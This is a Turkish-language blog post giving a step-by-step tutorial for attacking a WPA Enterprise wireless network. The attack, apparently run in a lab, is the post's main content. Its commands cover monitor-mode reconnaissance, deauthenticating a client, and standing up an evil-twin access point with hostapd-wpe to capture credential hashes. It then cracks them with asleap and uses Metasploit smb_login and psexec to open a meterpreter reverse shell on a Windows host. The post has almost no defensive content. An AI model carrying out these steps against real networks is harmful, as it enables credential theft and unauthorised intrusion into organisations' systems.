WPA Enterprise tipi kablosuz ağlara karşı saldırı örneği

WPA Enterprise tipi kablosuz ağlara karşı saldırı örneği
Mart 24 21:04 2018 Yazıyı Yazdır

İnternetin yaygınlaşmasıyla beraber hayatımızda bir çok şey kolaylaştı, örnek vermek gerekirse; dışarı çıkıp alışveriş yapmaktansa internet üzerinden alışveriş yapmayı neredeyse herkes tercih etmektedir. Fakat internetin hayatımızı bu kadar kolaylaştırmasının yanında birçok tehlikeyi de beraberinde getirmektedir.

Evet biliyorum çok klasik bir giriş oldu, ama öyle.. 🙂

Peki bu tehlikeler nelerdir? İşte bu konuda bir kablosuz ağ üzerinden gelebilecek bazı tehlikeleri ele alacağız.

Bu yazıda, kurumsal bir ağda Microsoft Active Directory üzerinde Authentication (Giriş -> Doğrulama) yapmayı sağlayan bir AP’yi (Access Point) hedef almaktayız. Saldırgan, AP’nin “H4cktimes” ismiyle yayın yaptığı kablosuz ağ için bu isimle aynı olacak şekilde sahte bir AP oluşturup kullanıcıların bağlanmasını bekleyecektir. Kullanıcıdan bağlantı kurma esnasında onun kullanıcı adı ve parolası istenecektir. Eğer kullanıcı, kullanıcı adı ve parolasını girerse bu bilgiler saldırganın eline geçecektir. Tabi kullanıcının parolası düz metin şeklinde değil hash formatında bize ulaşacaktır. Elde edilen bu hash kırılmaya çalışılıp, kırdıktan sonra gerçek H4cktimes ismindeki ağa bağlanılacaktır. Artık hedef ağa dahil olduktan sonra bu kullanıcı adı ve parola kullanılarak ağdaki ilgili bilgisayara Metasploit vasıtasıyla sızılacaktır.

İlk olarak ağ kartımızı monitör moda getirmemiz gerekiyor bunun için “airmon-ng” komutunu kullanarak interface ismimizi öğreniyoruz, ardından da “airmon-ng start wlan0” komutuyla interface’imizi monitor moda getiriyoruz. “airodump-ng wlan0mon” komutu ile de etrafta bulunan AP’ler için keşif başlatılır. Görüldüğü üzere bizim hedef AP’miz H4cktimes karşınızda.

Şimdi ise hedef ağımıza bağlı olan kullanıcıları tespit etmemiz gerekiyor bunun için airodump-ng aracını kullanacağız. Örnek kullanım komutu “airodump-ng –bssid <hedef BSSID> -C <hedef_kanal> <interface>” şeklindedir. Görüldüğü üzere “STATION” kısmında bağlı bir kullanıcı tespit ettik.

Artık hedef kablosuz ağdan kullanıcıyı düşürmeliyiz bu yüzden sıra “deauthentication” saldırısında..
aireplay-ng aracını kullanacağız, Örnek kullanımı “aireplay-ng –deauth 0 aa <BSSID> -c <STATION> <INTERFACE>” şeklindedir.

Kullanıcının kablosuz ağdan düştüğü an 🙂

Şimdi ise sahte AP oluşturmak için kullanılacak araç hostapd-wpe aracından faydalanacağız.
Bunun kurulumunu ”apt install hostapd-wpe” komutuyla gerçekleştirelim.

Kurulum işlemi bittikten sonra ise yayın yapacak olan AP’mize bir SSID tanımlamamız gerekiyor. Bunun için “nano /etc/hostapd-wpe/hostapd-wpe.conf” şeklinde konfigürasyon dosyasını nano yardımı ile düzenliyoruz.

Burada yapmamız gereken tek şey “#802.11 Options” altında bulunan “ssid=<SSID ismi>” bölümünden bir isim tanımlamaktır. Bu aşamada son olarak “CTRL+O” tuş kombinasyonlarını kullanarak Enter tuşuna basıp düzenlediğimiz dosyayı kaydedip çıkıyoruz.
Şimdi ise “airmon-ng” komutu kullanılarak ağ kartı tanımlı mı diye bakılır, ardından ise “airmon-ng check kill” komutu ile konuyla ilgili önceden çalıştırılmış aktif servisler varsa kaldırılır. Artık “hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf” komutuyla config dosyasından bilgileri çekilir ve sahte AP yayınımız başlar.

Kullanıcın bağlanmak istediği kablousz ağın ismiyle oluşturduğumuz H4cktimes SSID’sine domain hesabıyla giriş yaptığı an.
Not: Domain yapısı olmadığından yerel kullanıcı bilgileriyle giriş yapılmıştır.

Görüldüğü üzere kullanıcın girmiş olduğu kullanıcı adı ve parolasının hash’i dinleme yaptığımız ekrana düşmüştür. Şimdi ise elde edilen hash’in kırılması gerekiyor, bunun için de asleap aracını kullanacağız.
zcat <wordlist_path> asleap -C <elde edilen challenge> -R <elde edilen response> -W –“ şeklinde komutumuzu veriyoruz.

Görüldüğü gibi password kısmında enes.aslanbakan kullanıcısının parolası “P@ssw0rd1” olduğunu öğrendik.
Şimdi ise elde edilen kullanıcı adı ve parola ile hedef olan “H4cktimes” ağına bağlanılır. Ağa erişim sağladıktan sonra ise, Metasploit’i komut satırı üzerinden msfconsole -q komutuyla açıyoruz.
MSF içindeyken “use auxiliary/scanner/smb/smb_login” komutuyla smb_login modülü seçilir. Bu aşamada taranacak ağ bloğu ve elde ettiğimiz kullanıcı bilgileri modüle tanımlanır.
set RHOSTS x.x.x.x/xx” şeklinde ağ bloğu belirtiyoruz.
set SMBUSER <username>” şeklinde elde edilen kullanıcı adını tanımlıyoruz.
set SMBPASS <password>” şeklinde ise elde edilen password belirtilir ve son olarak “exploit” komutu ile tarama başlatılır.

Görüldüğü gibi [+] kısmında 192.168.2.3 IP adresindeki bilgisayara kullanıcı adı enes.aslanbakan ve parolası da P@ssw0rd1 olarak giriş başarılı olmuştur.

Tespit ve doğrulama işlemini gerçekleştirdikten sonra 192.168.2.3 IP adresli bilgisayara sızabilmek için PsExec (Pass the Hash) metodu kullanılacaktır. Bunun için yine MSF üzerinden bu sefer psexec modülünü seçiyoruz. Kullanacağımız komut “use exploit/windows/smb/psexec”.
Bu modüle öncelikle öncelikle bir payload tanımlamamız gereklidir. Ben bu yazımızda Metasploit’in komut satırı trojanı olan Meterpreter’ın reverse_shell metotlu payload’ını tercih ediyorum. Bunun için “set PAYLOAD windows/meterpreter/reverse_tcp” komutuyla payload tanımlamasını yapıyoruz. Ters bağlantının bize gelebilmesi için kendi yerel IP adresimizi “set LHOST <saldırgan_ip>” komutuyla tanımlıyoruz.
set RHOST <hedef_ip>” şeklinde hedef bilgisayarın IP adresini belirttik.
set SMBUSER <username>” ile kullanıcı adını, “set SMBPASS <password>” ile de parola tanımlamasını yapıyoruz ve son olarak da “exploit” komutu ile sisteme sızma girişimini başlatıyoruz.

Görüldüğü üzeri elde edilen bilgiler ile sistem üzerinden bir ters bağlantı alınmıştır, ve artık içerdeyiz 🙂

daha fazla yazı

Yazar Hakkında

Enes Aslanbakan
Enes Aslanbakan

Daha Fazla Yazı
yorum yapın

Yorum Yok

Henüz yorum yapılmamış

İlk yorumu siz yapabilirsiniz.

Yorum ekleyin

Bilgileriniz güvende! E-posta adresiniz yayınlanmayacak. Diğer kişisel bilgileriniz üçüncü partilerle paylaşılmayacak.
* işaretli alanlar zorunludur.

Time limit is exhausted. Please reload CAPTCHA.